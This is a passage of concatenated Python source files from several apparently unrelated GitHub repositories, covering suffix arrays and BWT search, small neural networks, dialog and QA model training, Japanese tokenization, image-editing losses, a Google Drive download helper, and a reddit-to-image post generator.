sa, rsa, lcp = self.suffix_array(text)
maxlen = max(lcp)
result = {}
for i in range(1, len(text)):
if lcp[i] == maxlen:
j1, j2, h = sa[i - 1], sa[i], lcp[i]
assert text[j1:j1 + h] == text[j2:j2 + h]
substring = text[j1:j1 + h]
if not substring in result:
result[substring] = [j1]
result[substring].append(j2)
return dict((k, sorted(v)) for k, v in result.items())
def suffix_array(self, text, _step=16):
"""Analyze all common strings in the text.
Short substrings of the length _step a are first pre-sorted. The are the
results repeatedly merged so that the garanteed number of compared
characters bytes is doubled in every iteration until all substrings are
sorted exactly.
Arguments:
text: The text to be analyzed.
_step: Is only for optimization and testing. It is the optimal length
of substrings used for initial pre-sorting. The bigger value is
faster if there is enough memory. Memory requirements are
approximately (estimate for 32 bit Python 3.3):
len(text) * (29 + (_size + 20 if _size > 2 else 0)) + 1MB
Return value: (tuple)
(sa, rsa, lcp)
sa: Suffix array for i in range(1, size):
assert text[sa[i-1]:] < text[sa[i]:]
rsa: Reverse suffix array for i in range(size):
assert rsa[sa[i]] == i
lcp: Longest common prefix for i in range(1, size):
assert text[sa[i-1]:sa[i-1]+lcp[i]] == text[sa[i]:sa[i]+lcp[i]]
if sa[i-1] + lcp[i] < len(text):
assert text[sa[i-1] + lcp[i]] < text[sa[i] + lcp[i]]
>>> suffix_array(text='banana')
([5, 3, 1, 0, 4, 2], [3, 2, 5, 1, 4, 0], [0, 1, 3, 0, 0, 2])
Explanation: 'a' < 'ana' < 'anana' < 'banana' < 'na' < 'nana'
The Longest Common String is 'ana': lcp[2] == 3 == len('ana')
It is between tx[sa[1]:] == 'ana' < 'anana' == tx[sa[2]:]
"""
tx = text
size = len(tx)
step = min(max(_step, 1), len(tx))
sa = list(range(len(tx)))
sa.sort(key=lambda i: tx[i:i + step])
grpstart = size * [False] + [True] # a boolean map for iteration speedup.
# It helps to skip yet resolved values. The last value True is a sentinel.
rsa = size * [None]
stgrp, igrp = '', 0
for i, pos in enumerate(sa):
st = tx[pos:pos + step]
if st != stgrp:
grpstart[igrp] = (igrp < i - 1)
stgrp = st
igrp = i
rsa[pos] = igrp
sa[i] = pos
grpstart[igrp] = (igrp < size - 1 or size == 0)
while grpstart.index(True) < size:
# assert step <= size
nextgr = grpstart.index(True)
while nextgr < size:
igrp = nextgr
nextgr = grpstart.index(True, igrp + 1)
glist = []
for ig in range(igrp, nextgr):
pos = sa[ig]
if rsa[pos] != igrp:
break
newgr = rsa[pos + step] if pos + step < size else -1
glist.append((newgr, pos))
glist.sort()
for ig, g in groupby(glist, key=itemgetter(0)):
g = [x[1] for x in g]
sa[igrp:igrp + len(g)] = g
grpstart[igrp] = (len(g) > 1)
for pos in g:
rsa[pos] = igrp
igrp += len(g)
step *= 2
del grpstart
# create LCP array
lcp = size * [None]
h = 0
for i in range(size):
if rsa[i] > 0:
j = sa[rsa[i] - 1]
while i != size - h and j != size - h and tx[i + h] == tx[j + h]:
h += 1
lcp[rsa[i]] = h
if h > 0:
h -= 1
if size > 0:
lcp[0] = 0
return sa, rsa, lcp
def bwt_via_sa(self, t, sa):
bwt = []
for si in sa:
if si == 0:
bwt += self.marker
else:
bwt += t[si - 1]
self.bwt = bwt
return self.bwt
def rank_bwt(self, bw):
ch_count = {}
ranks = []
for c in bw:
if c not in ch_count:
ch_count[c] = 0
ranks.append(ch_count[c])
ch_count[c] += 1
return ranks, ch_count
def first_col(self, ch_count):
# F must start from '$' marker
F = {self.marker: 1}
offset = 1
for c, count in sorted(ch_count.items()):
if c != self.marker: # Ignore '$' because we already add ther marker to F
F[c] = (offset, offset + count)
offset += count
return F
def rank(self, c, k):
return self.bwt[:k].count(c)
def rank_lt(self, c):
# TODO impl better way
assert self.ch_count is not None
F = self.first_col(self.ch_count)
if c in F:
return F[c][0]
else:
return None
def search(self, pat):
assert self.bwt is not None
assert self.sa is not None
# F = self.first_col(self.ch_count)
# L = self.bwt
begin = 0
end = len(self.bwt)
for c in pat[::-1]:
offset = self.rank_lt(c)
if offset is None:
begin, end = None, None
break
begin = offset + self.rank(c, begin)
end = offset + self.rank(c, end)
if begin >= end: # no results
begin, end = None, None
break
# print('[bwt] (begin, end)', begin, end)
match = []
if begin is not None and end is not None:
for i in range(begin, end):
match.append((self.sa[i], self.sa[i] + len(pat)))
return match
``` |
{
"source": "jojonki/docker-dev",
"score": 3
} |
#### File: jojonki/docker-dev/activations.py
```python
import numpy as np
class Sigmoid:
def __init__(self):
self.params = []
def forward(self, x):
return 1 / (1 + np.exp(-x))
if __name__ == '__main__':
x = np.random.randn(10, 2)
W1 = np.random.randn(2, 4)
b1 = np.random.randn(4)
W2 = np.random.randn(4, 3)
b2 = np.random.randn(3)
h = np.dot(x, W1) + b1 # (10, 4)
a = sigmoid(h) # (10, 4)
s = np.dot(a, W2) + b2 # (10, 3)
print(s)
```
#### File: jojonki/docker-dev/two_layer_net.py
```python
import numpy as np
from affine import Affine
from activations import Sigmoid
class TwoLayerNet:
def __init__(self, in_size, h_size, o_size):
I, H, O = in_size, h_size, o_size
W1 = np.random.randn(I, H)
b1 = np.random.randn(H)
W2 = np.random.randn(H, O)
b2 = np.random.randn(O)
self.layers = [
Affine(W1, b1),
Sigmoid(),
Affine(W2, b2)
]
self.params = []
for layer in self.layers:
self.params += layer.params
def predict(self, x):
for layer in self.layers:
x = layer.forward(x)
return x
def main():
x = np.random.randn(10, 2)
model = TwoLayerNet(2, 4, 3)
s = model.predict(x)
print('out:', s)
if __name__ == '__main__':
main()
``` |
{
"source": "jojonki/double_array",
"score": 3
} |
#### File: double_array/utils/gen_vocabs_from_ipa_wiki.py
```python
import argparse
import codecs
import glob
import gzip
import os
import time
from tqdm import tqdm
def main():
begin_time = time.time()
parser = argparse.ArgumentParser()
parser.add_argument('--ipadic_dir', type=str, metavar='PATH', default='./utils/mecab-ipadic-2.7.0-20070801', help='mecab ipadic dir')
parser.add_argument('--wiki', type=str, metavar='PATH',
default='./data/jawiki-latest-all-titles-in-ns0.gz',
help='wikipedia all titles file')
parser.add_argument('--out', type=str, metavar='PATH', default='./utils/ipa-wiki-vocab.txt', help='output filename')
args = parser.parse_args()
# get all the csv files in that directory (assuming they have the extension .csv)
print('Loading ipadic:', args.ipadic_dir)
csv_files = glob.glob(os.path.join(args.ipadic_dir, '*.csv'))
with open(args.out, 'w') as fout:
for c in csv_files:
print('Load', c)
with codecs.open(c, 'r', 'euc_jp') as fin:
for l in fin:
fout.write('{}\n'.format(l.split(',')[0]))
print('Loading wiki data:', args.wiki)
with gzip.open(args.wiki, 'r') as fin:
with open(args.out, 'w', encoding='utf-8') as fout:
lines = fin
for ln in tqdm(lines):
w = ln.decode('utf-8').strip()
if len(w) >= 2:
print(w, file=fout)
print('Output:', args.out)
print('Process time: {:.1f}s'.format(time.time() - begin_time))
if __name__ == '__main__':
main()
``` |
{
"source": "jojonki/Hybrid-Code-Networks",
"score": 2
} |
#### File: jojonki/Hybrid-Code-Networks/utils.py
```python
import re
import copy
import pickle
import numpy as np
from collections import OrderedDict
import torch
from torch.autograd import Variable
import global_variables as g
def save_checkpoint(state, filename='./checkpoints/checkpoint.pth.tar'):
print('save model!', filename)
torch.save(state, filename)
def save_pickle(d, path):
print('save pickle to', path)
with open(path, mode='wb') as f:
pickle.dump(d, f)
def load_pickle(path):
print('load', path)
with open(path, mode='rb') as f:
return pickle.load(f)
def get_entities(fpath):
entities = OrderedDict({'R_cuisine': [], 'R_location': [], 'R_price': [], 'R_number': []})
with open(fpath, 'r') as file:
lines = file.readlines()
for l in lines:
wds = l.rstrip().split(' ')[2].split('\t')
slot_type = wds[0] # ex) R_price
slot_val = wds[1] # ex) cheap
# if slot_type not in entities:
# entities[slot_type] = []
if slot_type in entities:
if slot_val not in entities[slot_type]:
entities[slot_type].append(slot_val)
return entities
def load_embd_weights(word2vec, vocab_size, embd_size, w2i):
embedding_matrix = np.zeros((vocab_size, embd_size))
print('embed_matrix.shape', embedding_matrix.shape)
found_ct = 0
for word, idx in w2i.items():
# words not found in embedding index will be all-zeros.
if word in word2vec.wv:
embedding_matrix[idx] = word2vec.wv[word]
found_ct += 1
print(found_ct, 'words are found in word2vec. vocab_size is', vocab_size)
return torch.from_numpy(embedding_matrix).type(torch.FloatTensor)
def preload(fpath, vocab, system_acts):
with open(fpath, 'r') as f:
lines = f.readlines()
for idx, l in enumerate(lines):
l = l.rstrip()
if l != '':
ls = l.split("\t")
t_u = ls[0].split(' ', 1)
# turn = t_u[0]
uttr = t_u[1].split(' ')
if len(ls) == 2: # includes user and system utterance
for w in uttr:
if w not in vocab:
vocab.append(w)
if len(ls) == 2: # includes user and system utterance
sys_act = ls[1]
sys_act = re.sub(r'resto_\S+', '', sys_act)
if sys_act.startswith('api_call'): sys_act = 'api_call'
if sys_act not in system_acts: system_acts.append(sys_act)
vocab = sorted(vocab)
system_acts = sorted(system_acts)
return vocab, system_acts
def load_data(fpath, entities, w2i, system_acts):
'''
store data as dialog (multi turns)
'''
data = []
with open(fpath, 'r') as f:
lines = f.readlines()
# x: user uttr, y: sys act, c: context, b: BoW, p: previous sys act, f: action filter
x, y, c, b, p, f = [], [], [], [], [], []
context = [0] * len(entities.keys())
for idx, l in enumerate(lines):
l = l.rstrip()
if l == '':
data.append((x, y, c, b, p, f))
# reset
x, y, c, b, p, f = [], [], [], [], [], []
context = [0] * len(entities.keys())
else:
ls = l.split("\t")
t_u = ls[0].split(' ', 1)
# turn = t_u[0]
uttr = t_u[1].split(' ')
update_context(context, uttr, entities)
act_filter = generate_act_filter(len(system_acts), context)
bow = get_bow(uttr, w2i)
sys_act = g.SILENT
if len(ls) == 2: # includes user and system utterance
sys_act = ls[1]
sys_act = re.sub(r'resto_\S+', '', sys_act)
if sys_act.startswith('api_call'): sys_act = 'api_call'
else:
continue # TODO
x.append(uttr)
if len(y) == 0:
p.append(g.SILENT)
else:
p.append(y[-1])
y.append(sys_act)
c.append(copy.deepcopy(context))
b.append(bow)
f.append(act_filter)
return data, system_acts
def update_context(context, sentence, entities):
for idx, (ent_key, ent_vals) in enumerate(entities.items()):
for w in sentence:
if w in ent_vals:
context[idx] = 1
def generate_act_filter(action_size, context):
mask = [0] * action_size
# TODO hard coding
# 0 <SILENT>
# 1 any preference on a type of cuisine
# 2 api_call
# 3 great let me do the reservation
# 4 hello what can i help you with today
# 5 here it is
# 6 how many people would be in your party
# 7 i'm on it
# 8 is there anything i can help you with
# 9 ok let me look into some options for you
# 10 sure is there anything else to update
# 11 sure let me find an other option for you
# 12 what do you think of this option:
# 13 where should it be
# 14 which price range are looking for
# 15 you're welcome
# context: {'R_cuisine': [], 'R_location': [], 'R_price': [], 'R_number': []}
mask[0] = 1
mask[7] = 1
mask[8] = 1
if context == [0, 0, 0, 0]:
mask[4] = 1
if context == [1, 1, 1, 1]:
mask[2] = 1
mask[3] = 1
mask[5] = 1
mask[8] = 1
mask[9] = 1
mask[10] = 1
mask[11] = 1
mask[12] = 1
mask[15] = 1
if context[0] == 0: # R_cuisine
mask[1] = 1
if context[1] == 0: # R_location
mask[13] = 1
if context[2] == 0: # R_price
mask[14] = 1
if context[3] == 0: # R_number
mask[6] = 1
return mask
def get_bow(sentence, w2i):
bow = [0] * len(w2i)
for word in sentence:
if word in w2i:
bow[w2i[word]] += 1
return bow
def add_padding(data, seq_len):
pad_len = max(0, seq_len - len(data))
data += [0] * pad_len
data = data[:seq_len]
return data
def make_word_vector(uttrs_list, w2i, dialog_maxlen, uttr_maxlen):
dialog_list = []
for uttrs in uttrs_list:
dialog = []
for sentence in uttrs:
sent_vec = [w2i[w] if w in w2i else w2i[g.UNK] for w in sentence]
sent_vec = add_padding(sent_vec, uttr_maxlen)
dialog.append(sent_vec)
for _ in range(dialog_maxlen - len(dialog)):
dialog.append([0] * uttr_maxlen)
dialog = torch.LongTensor(dialog[:dialog_maxlen])
dialog_list.append(dialog)
return to_var(torch.stack(dialog_list, 0))
def to_var(x):
if torch.cuda.is_available():
x = x.cuda()
return Variable(x)
def padding(data, default_val, maxlen, pad_seq_len):
for i, d in enumerate(data):
pad_len = maxlen - len(d)
for _ in range(pad_len):
data[i].append([default_val] * pad_seq_len)
return to_var(torch.FloatTensor(data))
def get_data_from_batch(batch, w2i, act2i):
uttrs_list = [d[0] for d in batch]
dialog_maxlen = max([len(uttrs) for uttrs in uttrs_list])
uttr_maxlen = max([len(u) for uttrs in uttrs_list for u in uttrs])
uttr_var = make_word_vector(uttrs_list, w2i, dialog_maxlen, uttr_maxlen)
batch_labels = [d[1] for d in batch]
labels_var = []
for labels in batch_labels:
vec_labels = [act2i[l] for l in labels]
pad_len = dialog_maxlen - len(labels)
for _ in range(pad_len):
vec_labels.append(act2i[g.SILENT])
labels_var.append(torch.LongTensor(vec_labels))
labels_var = to_var(torch.stack(labels_var, 0))
batch_prev_acts = [d[4] for d in batch]
prev_var = []
for prev_acts in batch_prev_acts:
vec_prev_acts = []
for act in prev_acts:
tmp = [0] * len(act2i)
tmp[act2i[act]] = 1
vec_prev_acts.append(tmp)
pad_len = dialog_maxlen - len(prev_acts)
for _ in range(pad_len):
vec_prev_acts.append([0] * len(act2i))
prev_var.append(torch.FloatTensor(vec_prev_acts))
prev_var = to_var(torch.stack(prev_var, 0))
context = copy.deepcopy([d[2] for d in batch])
context = padding(context, 1, dialog_maxlen, len(context[0][0]))
bow = copy.deepcopy([d[3] for d in batch])
bow = padding(bow, 0, dialog_maxlen, len(bow[0][0]))
act_filter = copy.deepcopy([d[5] for d in batch])
act_filter = padding(act_filter, 0, dialog_maxlen, len(act_filter[0][0]))
return uttr_var, labels_var, context, bow, prev_var, act_filter
``` |
{
"source": "jojonki/levenshtein-distance",
"score": 3
} |
#### File: jojonki/levenshtein-distance/main.py
```python
import argparse
from leven_shtein import LevenShtein as LS
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', type=int, default=0, help='print log')
parser.add_argument('--normalize', type=int, default=1, help='normalize levenshtein distance')
parser.add_argument('--mode', type=str, default='char', help='tokenization mode. char or word. word mode is only for Japanese')
parser.add_argument('--strA', type=str, help='string A')
parser.add_argument('--strB', type=str, help='string B')
args = parser.parse_args()
if args.mode == 'word':
from janome.tokenizer import Tokenizer
def main():
strA = '今日は良い天気だよね'
strB = '今日は曇ってるよね'
if args.strA:
strA = args.strA
if args.strB:
strB = args.strB
if args.mode == 'word':
t = Tokenizer()
strA = [token.surface for token in t.tokenize(strA)]
strB = [token.surface for token in t.tokenize(strB)]
v = True if args.verbose == 1 else False
n = True if args.normalize == 1 else False
ed = LS.edit_distance(strA, strB, normalize=n, verbose=v)
print('Edit distance:', ed)
if __name__ == '__main__':
main()
``` |
{
"source": "jojonki/ngram",
"score": 3
} |
#### File: jojonki/ngram/test.py
```python
from ngram import Ngram
def test():
ng = Ngram()
# Your n-gram model is trained with a text file
ng.train('data/wiki-en-train.word')
# You can save your trained model as text. Currently, we do not support loading trained model.
ng.dump('trained_model')
# You can evaluate your trained model with test file
ng.test('data/wiki-en-test.word')
# After your evaluation, you can retrieve the below results.
print('log-likelihood\t={}'.format(ng.log_likelihood))
print('entropy\t={}'.format(ng.entropy))
print('perplexity\t={}'.format(ng.perplexity))
print('coverage\t={}'.format(ng.coverage))
if __name__ == '__main__':
test()
``` |
{
"source": "jojonki/QA-LSTM",
"score": 3
} |
#### File: jojonki/QA-LSTM/train.py
```python
import os
import random
import argparse
from tqdm import tqdm
import numpy as np
import torch
from gensim.models.keyedvectors import KeyedVectors
from utils import load_data, load_data2, load_vocabulary, Config, load_embd_weights
from utils import make_vector
from models import QA_LSTM
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=128, help='input batch size')
parser.add_argument('--start_epoch', type=int, default=0, help='resume epoch count, default=0')
parser.add_argument('--n_epochs', type=int, default=4, help='input batch size')
parser.add_argument('--embd_size', type=int, default=300, help='word embedding size')
parser.add_argument('--hidden_size', type=int, default=141, help='hidden size of one-directional LSTM')
parser.add_argument('--max_sent_len', type=int, default=200, help='max sentence length')
parser.add_argument('--margin', type=float, default=0.2, help='margin for loss function')
parser.add_argument('--use_pickle', type=int, default=0, help='load dataset from pickles')
parser.add_argument('--test', type=int, default=0, help='1 for test, or for training')
parser.add_argument('--seed', type=int, default=1111, help='random seed')
parser.add_argument('--resume', default='./checkpoints/model_best.tar', type=str, metavar='PATH', help='path saved params')
args = parser.parse_args()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
PAD = '<PAD>'
id_to_word, label_to_ans, label_to_ans_text = load_vocabulary('./V2/vocabulary', './V2/InsuranceQA.label2answer.token.encoded')
w2i = {w: i for i, w in enumerate(id_to_word.values(), 1)}
w2i[PAD] = 0
vocab_size = len(w2i)
print('vocab_size:', vocab_size)
train_data = load_data('./V2/InsuranceQA.question.anslabel.token.500.pool.solr.train.encoded', id_to_word, label_to_ans_text)
test_data = load_data2('./V2/InsuranceQA.question.anslabel.token.500.pool.solr.test.encoded', id_to_word, label_to_ans_text)
print('n_train:', len(train_data))
print('n_test:', len(test_data))
args.vocab_size = vocab_size
args.pre_embd = None
print('loading a word2vec binary...')
model_path = './GoogleNews-vectors-negative300.bin'
word2vec = KeyedVectors.load_word2vec_format(model_path, binary=True)
print('loaded!')
pre_embd = load_embd_weights(word2vec, vocab_size, args.embd_size, w2i)
# save_pickle(pre_embd, 'pre_embd.pickle')
args.pre_embd = pre_embd
def save_checkpoint(state, filename):
print('save model!', filename)
torch.save(state, filename)
def loss_fn(pos_sim, neg_sim):
loss = args.margin - pos_sim + neg_sim
if loss.data[0] < 0:
loss.data[0] = 0
return loss
def train(model, data, test_data, optimizer, n_epochs=4, batch_size=256):
for epoch in range(n_epochs):
model.train()
print('epoch', epoch)
random.shuffle(data) # TODO use idxies
losses = []
for i, d in enumerate(tqdm(data)):
q, pos, negs = d[0], d[1], d[2]
vec_q = make_vector([q], w2i, len(q))
vec_pos = make_vector([pos], w2i, len(pos))
pos_sim = model(vec_q, vec_pos)
for _ in range(50):
neg = random.choice(negs)
vec_neg = make_vector([neg], w2i, len(neg))
neg_sim = model(vec_q, vec_neg)
loss = loss_fn(pos_sim, neg_sim)
if loss.data[0] != 0:
losses.append(loss)
break
if len(losses) == batch_size or i == len(data) - 1:
loss = torch.mean(torch.stack(losses, 0).squeeze(), 0)
print(loss.data[0])
optimizer.zero_grad()
loss.backward()
optimizer.step()
losses = []
filename = '{}/Epoch-{}.model'.format('./checkpoints', epoch)
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'optimizer' : optimizer.state_dict(),
}, filename=filename)
test(model, test_data)
def test(model, data):
acc, total = 0, 0
for d in data:
q = d[0]
print('q', ' '.join(q))
labels = d[1]
cands = d[2]
# preprare answer labels
label_indices = [cands.index(l) for l in labels if l in cands]
# build data
q = make_vector([q], w2i, len(q))
cands = [label_to_ans_text[c] for c in cands] # id to text
max_cand_len = min(args.max_sent_len, max([len(c) for c in cands]))
cands = make_vector(cands, w2i, max_cand_len)
# predict
scores = [model(q, c.unsqueeze(0)).data[0] for c in cands]
pred_idx = np.argmax(scores)
if pred_idx in label_indices:
print('correct')
acc += 1
else:
print('wrong')
total += 1
print('Test Acc:', 100*acc/total, '%')
model = QA_LSTM(args)
if torch.cuda.is_available():
model.cuda()
# optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr=0.01)
optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()))
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
# best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer']) # TODO ?
print("=> loaded checkpoint '{}' (epoch {})".format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
train(model, train_data, test_data, optimizer)
# test(model, test_data)
``` |
{
"source": "jojonki/Taiyaki",
"score": 3
} |
#### File: Taiyaki/examples/create_lattice.py
```python
import argparse
import os
import sys
import time
parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(parent_dir)
from double_array import DoubleArray
from lattice import Lattice
def main():
# begin_time = time.time()
parser = argparse.ArgumentParser()
parser.add_argument('--dict', type=str, default='./models/ipadic-vocab.txt.dict', metavar='PATH', help='double-array dictionary')
parser.add_argument('-q', '--query', type=str, help='query')
args = parser.parse_args()
da = DoubleArray()
print('Loading dic...')
da.load(args.dict)
print('Loaded!')
query = args.query
lattice = Lattice(query)
for idx in range(len(query)):
cps_q = query[idx:]
print('=====Search {}======'.format(cps_q))
cp_list = da.commonPrefixSearch(cps_q)
print('commonPrefixSearch("{}"): {}'.format(cps_q, cp_list))
for cp in cp_list:
lattice.insert(idx, idx + len(cp), cp)
# print('Process time: {:.1f}s'.format(time.time() - begin_time))
lattice.pprint()
lattice.plot()
if __name__ == '__main__':
main()
```
#### File: Taiyaki/examples/run_tokenizer.py
```python
import argparse
import copy
import os
import sys
import time
parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(parent_dir)
from taiyaki.taiyaki import Taiyaki
def run(taiyaki, query):
cp_list = taiyaki.commonPrefixSearch(query)
print('Common prefixes: {}'.format(cp_list))
tokens = taiyaki.tokenize(query)
print('Tokenized tokens (min cost):')
print('{}\t{}\t{}\t{}'.format('表層系', '品詞', '発音', '未知語'))
for t in tokens:
print('{}\t{}\t{}\t{}'.format(t['surface'], t['pos'], t['pron'], t['unk']))
tokens = taiyaki.longestSearch(query)
print('Tokenized tokens (longest match):', tokens)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--da_dic_file',
type=str,
default='./data/da.dict',
metavar='PATH',
help='double-array dictionary')
parser.add_argument('--vocab_dic_file',
type=str,
metavar='PATH',
default='./data/vocab.dict',
help='vocabulary dictionary')
parser.add_argument('--trans_cost_file',
type=str,
metavar='PATH',
default='./data/trans_cost.dict',
help='token transition cost dictionary')
parser.add_argument('--char_cat_def_file',
type=str,
metavar='PATH',
default='./data/char_cat_def.dict',
help='char.def dictionary for unk words')
parser.add_argument('-q', '--query',
type=str,
help='input query')
args = parser.parse_args()
taiyaki = Taiyaki(args.da_dic_file, args.vocab_dic_file, args.trans_cost_file, args.char_cat_def_file)
query = args.query
if query:
print('Input:', query)
run(taiyaki, query)
else:
while True:
query =input('Query (press "end" to exit)>> ')
if query == 'end':
break
run(taiyaki, query)
if __name__ == '__main__':
main()
```
#### File: Taiyaki/test/4-6_build_double_array.py
```python
from collections import OrderedDict
base = [0] * 10
check = [0] * 10
code = {'#': 0, 'a': 1, 'b': 2, 'c': 3, 'd': 4}
def build_double_array(dic):
s = 1
base[1] = s
crnt_pref = ''
pref_list = []
for k in dic.keys():
if k[0] not in pref_list:
pref_list.append(k[0])
ptr = s + 1
for c in pref_list:
print(c)
check[ptr] = s
# 葉ノードチェック
pref = crnt_pref + c
pref_count = 0
for d in dic.keys():
if d.startswith(pref):
pref_count += 1
if pref_count > 1: # cから始まるデータが2件以上見つかったら葉ノードではない
break
if pref_count == 1:
base[ptr] = -dic[pref]
ptr += 1
s = s + 1
for c in pref_list:
sub_pref_list = [d for d in dic.keys() if d.startswith(c)]
for sub in sub_pref_list:
print(sub_pref_list)
print('base ', base)
print('check', check)
dic = OrderedDict({'a': 1, 'ac': 2, 'b': 3, 'cab': 4, 'cd': 5})
build_double_array(dic)
``` |
{
"source": "jojoon99/Barbershop",
"score": 2
} |
#### File: Barbershop/losses/align_loss.py
```python
import torch
from losses.style.style_loss import StyleLoss
class AlignLossBuilder(torch.nn.Module):
def __init__(self, opt):
super(AlignLossBuilder, self).__init__()
self.opt = opt
self.parsed_loss = [[opt.l2_lambda, 'l2'], [opt.percept_lambda, 'percep']]
if opt.device == 'cuda':
use_gpu = True
else:
use_gpu = False
self.cross_entropy = torch.nn.CrossEntropyLoss()
self.style = StyleLoss(distance="l2", VGG16_ACTIVATIONS_LIST=[3, 8, 15, 22], normalize=False).to(opt.device)
self.style.eval()
tmp = torch.zeros(16).to(opt.device)
tmp[0] = 1
self.cross_entropy_wo_background = torch.nn.CrossEntropyLoss(weight=1 - tmp)
self.cross_entropy_only_background = torch.nn.CrossEntropyLoss(weight=tmp)
def cross_entropy_loss(self, down_seg, target_mask):
loss = self.opt.ce_lambda * self.cross_entropy(down_seg, target_mask)
return loss
def style_loss(self, im1, im2, mask1, mask2):
loss = self.opt.style_lambda * self.style(im1 * mask1, im2 * mask2, mask1=mask1, mask2=mask2)
return loss
def cross_entropy_loss_wo_background(self, down_seg, target_mask):
loss = self.opt.ce_lambda * self.cross_entropy_wo_background(down_seg, target_mask)
return loss
def cross_entropy_loss_only_background(self, down_seg, target_mask):
loss = self.opt.ce_lambda * self.cross_entropy_only_background(down_seg, target_mask)
return loss
```
#### File: losses/style/custom_loss.py
```python
import torch
import torch.nn as nn
from torch.nn import functional as F
mse_loss = nn.MSELoss(reduction="mean")
def custom_loss(x, y, mask=None, loss_type="l2", include_bkgd=True):
"""
x, y: [N, C, H, W]
Computes L1/L2 loss
if include_bkgd is True:
use traditional MSE and L1 loss
else:
mask out background info using :mask
normalize loss with #1's in mask
"""
if include_bkgd:
# perform simple mse or l1 loss
if loss_type == "l2":
loss_rec = mse_loss(x, y)
elif loss_type == "l1":
loss_rec = F.l1_loss(x, y)
return loss_rec
Nx, Cx, Hx, Wx = x.shape
Nm, Cm, Hm, Wm = mask.shape
mask = prepare_mask(x, mask)
x_reshape = torch.reshape(x, [Nx, -1])
y_reshape = torch.reshape(y, [Nx, -1])
mask_reshape = torch.reshape(mask, [Nx, -1])
if loss_type == "l2":
diff = (x_reshape - y_reshape) ** 2
elif loss_type == "l1":
diff = torch.abs(x_reshape - y_reshape)
# diff: [N, Cx * Hx * Wx]
# set elements in diff to 0 using mask
masked_diff = diff * mask_reshape
sum_diff = torch.sum(masked_diff, axis=-1)
# count non-zero elements; add :mask_reshape elements
norm_count = torch.sum(mask_reshape, axis=-1)
diff_norm = sum_diff / (norm_count + 1.0)
loss_rec = torch.mean(diff_norm)
return loss_rec
def prepare_mask(x, mask):
"""
Make mask similar to x.
Mask contains values in [0, 1].
Adjust channels and spatial dimensions.
"""
Nx, Cx, Hx, Wx = x.shape
Nm, Cm, Hm, Wm = mask.shape
if Cm == 1:
mask = mask.repeat(1, Cx, 1, 1)
mask = F.interpolate(mask, scale_factor=Hx / Hm, mode="nearest")
return mask
```
#### File: Barbershop/utils/drive.py
```python
import requests
import html
import hashlib
import glob
import os
import io
from typing import Any
import re
import uuid
def is_url(obj: Any) -> bool:
"""Determine whether the given object is a valid URL string."""
if not isinstance(obj, str) or not "://" in obj:
return False
try:
res = requests.compat.urlparse(obj)
if not res.scheme or not res.netloc or not "." in res.netloc:
return False
res = requests.compat.urlparse(requests.compat.urljoin(obj, "/"))
if not res.scheme or not res.netloc or not "." in res.netloc:
return False
except:
return False
return True
def open_url(url: str, cache_dir: str = None, num_attempts: int = 10, verbose: bool = True, return_path: bool = False) -> Any:
"""Download the given URL and return a binary-mode file object to access the data."""
assert is_url(url)
assert num_attempts >= 1
# Lookup from cache.
url_md5 = hashlib.md5(url.encode("utf-8")).hexdigest()
if cache_dir is not None:
cache_files = glob.glob(os.path.join(cache_dir, url_md5 + "_*"))
if len(cache_files) == 1:
if(return_path):
return cache_files[0]
else:
return open(cache_files[0], "rb")
# Download.
url_name = None
url_data = None
with requests.Session() as session:
if verbose:
print("Downloading %s ..." % url, end="", flush=True)
for attempts_left in reversed(range(num_attempts)):
try:
with session.get(url) as res:
res.raise_for_status()
if len(res.content) == 0:
raise IOError("No data received")
if len(res.content) < 8192:
content_str = res.content.decode("utf-8")
if "download_warning" in res.headers.get("Set-Cookie", ""):
links = [html.unescape(link) for link in content_str.split('"') if "export=download" in link]
if len(links) == 1:
url = requests.compat.urljoin(url, links[0])
raise IOError("Google Drive virus checker nag")
if "Google Drive - Quota exceeded" in content_str:
raise IOError("Google Drive quota exceeded")
match = re.search(r'filename="([^"]*)"', res.headers.get("Content-Disposition", ""))
url_name = match[1] if match else url
url_data = res.content
if verbose:
print(" done")
break
except:
if not attempts_left:
if verbose:
print(" failed")
raise
if verbose:
print(".", end="", flush=True)
# Save to cache.
if cache_dir is not None:
safe_name = re.sub(r"[^0-9a-zA-Z-._]", "_", url_name)
cache_file = os.path.join(cache_dir, url_md5 + "_" + safe_name)
temp_file = os.path.join(cache_dir, "tmp_" + uuid.uuid4().hex + "_" + url_md5 + "_" + safe_name)
os.makedirs(cache_dir, exist_ok=True)
with open(temp_file, "wb") as f:
f.write(url_data)
os.replace(temp_file, cache_file) # atomic
if(return_path): return cache_file
# Return data as file object.
return io.BytesIO(url_data)
``` |
{
"source": "JoJoPuppe/reddit-to-imgurImage",
"score": 3
} |
#### File: reddit-to-imgurImage/reddit_to_imgurImage/image_post.py
```python
from PIL import ImageDraw, ImageFont
from reddit_to_imgurImage.textfitter import CenterdTextImage
from reddit_to_imgurImage.gradient import Gradient
from datetime import datetime
class Post(object):
def __init__(self, size, font_path):
self.size = size
self.post_size = (size, size)
self.image = None
self.font_path = font_path
def create_text_image(self, text):
text_box_size = (self.size - 100, self.size - 100)
image = CenterdTextImage(self.post_size, text_box_size, self.font_path)
image.load_text(text)
image = image.write_text_lines()
return image
def combine_gradient_and_text(self, text):
gradient = Gradient(self.size)
gradient_img = gradient.random_gradient()
text_box = self.create_text_image(text)
text_image = ImageDraw.Draw(text_box)
text_image.rectangle([(25, 25), (self.size - 25, self.size - 25)],
outline=(255, 255, 255), width=3)
gradient_img.paste(text_box, (0, 0, self.size, self.size), text_box)
self.image = gradient_img
def add_source(self, source_string):
font = ImageFont.truetype(self.font_path, 15)
